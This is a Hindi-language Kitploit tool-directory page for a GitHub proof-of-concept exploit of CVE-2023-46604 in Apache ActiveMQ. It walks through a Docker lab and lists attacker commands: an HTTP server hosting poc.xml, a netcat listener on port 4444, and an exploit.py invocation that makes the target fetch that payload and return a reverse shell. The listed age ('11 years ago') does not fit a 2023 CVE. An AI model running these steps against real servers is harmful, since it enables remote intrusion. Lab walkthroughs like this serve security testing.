Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2023-46604 — CVE-2023-46604 के लिए PoC एक्सप्लॉइट जो Apache ActiveMQ को लक्षित करता है, HTTP पर क्राफ्टेड XML पेलोड के माध्यम से रिवर्स शेल प्रदान करता है। | Kitploit
उपकरण/GitHubGitHub/cuanh2333/cve-2023-46604
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरिमोट एक्सेस टूल
GitHubcuanh2333/cve-2023-46604

CVE-2023-46604

CVE-2023-46604 के लिए PoC एक्सप्लॉइट जो Apache ActiveMQ को लक्षित करता है, HTTP पर क्राफ्टेड XML पेलोड के माध्यम से रिवर्स शेल प्रदान करता है।

रिपॉजिटरी देखें
11 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2023-46604

image

आवश्यक वातावरण के अनुसार victim machine और target machine को शामिल करते हुए docker-compose बनाएं। Victim machine पर ActiveMQ प्रारंभ करें।

अब attacker machine पर जाएँ: • PoC भेजने के लिए HTTP सेवा प्रारंभ करें: python3 -m http.server

• Attacker machine पर आने वाले कनेक्शन को सुनने के लिए netcat का उपयोग करें: nc -nlvp 4444

• Reverse shell कनेक्शन बनाने के लिए payload भेजें: python3 exploit.py -i 172.18.0.3 -p 61616 --xml http://172.18.0.2:8000/poc.xml जहाँ:

  • Exploit.py: vulnerability exploit कोड फ़ाइल
  • -I 172.18.0.3: payload भेजने वाली machine का IP address
  • -p 61616: वह पोर्ट जिस पर victim machine का ActiveMQ सुन रहा है
  • --xml http://172.18.0.2:8000/poc.xml: attacker machine पर poc.xml फ़ाइल का URL पता

यह देखा जा सकता है कि 'exploit.py' फ़ाइल को निष्पादित करने के बाद, exploit कोड web server पर मौजूद 'poc.xml' पैकेट को उस लक्ष्य पर भेजता है जो target server पर चल रही ActiveMQ सेवा का पता है। साथ ही, attacker machine पर चल रहे HTTP webserver को target machine के IP पते से भेजा गया request भी प्राप्त होता है।

Payload भेजने के बाद, attacker machine के पोर्ट 4444 पर सुन रहे टर्मिनल पर जाएँ। हम देख सकते हैं कि victim machine का reverse shell वापस भेज दिया गया है।

टूल डाउनलोड करें